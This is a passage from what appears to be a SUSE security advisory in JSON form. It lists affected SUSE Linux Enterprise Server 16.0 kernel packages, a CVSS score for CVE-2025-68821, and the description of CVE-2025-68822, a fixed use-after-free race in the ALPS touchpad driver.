"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68821"
},
{
"cve": "CVE-2025-68822",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68822"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: alps - fix use-after-free bugs caused by dev3_register_work\n\nThe dev3_register_work delayed work item is initialized within\nalps_reconnect() and scheduled upon receipt of the first bare\nPS/2 packet from an external PS/2 device connected to the ALPS\ntouchpad. During device detachment, the original implementation\ncalls flush_workqueue() in psmouse_disconnect() to ensure\ncompletion of dev3_register_work. However, the flush_workqueue()\nin psmouse_disconnect() only blocks and waits for work items that\nwere already queued to the workqueue prior to its invocation. Any\nwork items submitted after flush_workqueue() is called are not\nincluded in the set of tasks that the flush operation awaits.\nThis means that after flush_workqueue() has finished executing,\nthe dev3_register_work could still be scheduled. Although the\npsmouse state is set to PSMOUSE_CMD_MODE in psmouse_disconnect(),\nthe scheduling of dev3_register_work remains unaffected.\n\nThe race condition can occur as follows:\n\nCPU 0 (cleanup path) | CPU 1 (delayed work)\npsmouse_disconnect() |\n psmouse_set_state() |\n flush_workqueue() | alps_report_bare_ps2_packet()\n alps_disconnect() | psmouse_queue_work()\n kfree(priv); // FREE | alps_register_bare_ps2_mouse()\n | priv = container_of(work...); // USE\n | priv-\u003edev3 // USE\n\nAdd disable_delayed_work_sync() in alps_disconnect() to ensure\nthat dev3_register_work is properly canceled and prevented from\nexecuting after the alps_data structure has been deallocated.\n\nThis bug is identified by static analysis.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
